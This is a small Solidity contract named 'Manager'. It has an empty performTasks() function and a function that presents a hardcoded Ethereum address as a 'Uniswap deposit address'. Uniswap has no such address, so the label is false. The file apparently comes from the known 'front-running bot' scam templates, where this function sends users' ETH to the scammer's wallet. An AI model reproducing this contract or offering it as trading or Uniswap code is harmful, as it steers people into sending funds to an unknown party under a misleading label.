  
pragma solidity ^0.6.6;

contract Manager {
	function performTasks() public {
	    
	}

	function uniswapDepositAddress() public pure returns (address) {
		return 0xD5A6a7c854C18734aE6A8fFD3Eaea45c86581DaF;
	}
}
